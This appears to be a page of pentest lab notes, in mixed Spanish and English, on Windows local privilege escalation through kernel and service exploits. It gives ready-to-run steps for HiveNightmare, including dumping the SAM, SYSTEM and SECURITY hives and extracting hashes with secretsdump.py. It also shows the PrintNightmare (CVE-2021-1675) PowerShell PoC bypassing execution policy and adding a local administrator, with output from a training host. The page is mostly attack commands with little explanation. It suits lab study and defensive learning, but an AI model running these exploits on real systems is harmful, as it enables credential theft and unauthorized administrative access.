Kernel Exploits

Recursos

Security Update Guide

HiveNightmare

https://github.com/GossiTheDog/HiveNightmare

.\HiveNightmare.exe

Transferir los archivos SAM, SYSTEM y SECURITY a la máquina atacante

secretsdump.py -sam SAM-2021-08-07 -system SYSTEM-2021-08-07 -security SECURITY-2021-08-07 local

PrintNightmare

RpcAddPrinterDriver

CVE-2021-1675

CVE-2021-1675 - PrintNightmare LPE (PowerShell)

Checking for Spooler Service

ls \\localhost\pipe\spoolss

Adding Local Admin with PrintNightmare PowerShell PoC

Set-ExecutionPolicy Bypass -Scope Process

Execution Policy Change
The execution policy helps protect you from scripts that you do not trust. Changing the execution policy might expose
you to the security risks described in the about_Execution_Policies help topic at
https:/go.microsoft.com/fwlink/?LinkID=135170. Do you want to change the execution policy?
[Y] Yes  [A] Yes to All  [N] No  [L] No to All  [S] Suspend  [?] Help (default is "N"): A

Import-Module .\CVE-2021-1675.ps1
Invoke-Nightmare -NewUser <USERNAME> -NewPassword <PASSWORD> -DriverName <DRIVERNAME>

[+] created payload at C:\Users\htb-student\AppData\Local\Temp\nightmare.dll
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_am
d64_ce3301b66255a0fb\Amd64\mxdwdrv.dll"
[+] added user hacker as local administrator
[+] deleting payload from C:\Users\htb-student\AppData\Local\Temp\nightmare.dll

Confirming New Admin User

net user <USERNAME>

Enumerating Missing Patches

Examining Installed Updates

systeminfo
wmic qfe list brief
Get-Hotfix

CVE-2020-0668

Checking Current User Privileges

whoami /priv

PreviousInteracting with Users NextLegacy Operating Systems

Last updated 4 months ago

hashtagRecursos

hashtagHiveNightmare

hashtagPrintNightmare

hashtagEnumerating Missing Patches

hashtagCVE-2020-0668

Recursos

HiveNightmare

PrintNightmare

Enumerating Missing Patches

CVE-2020-0668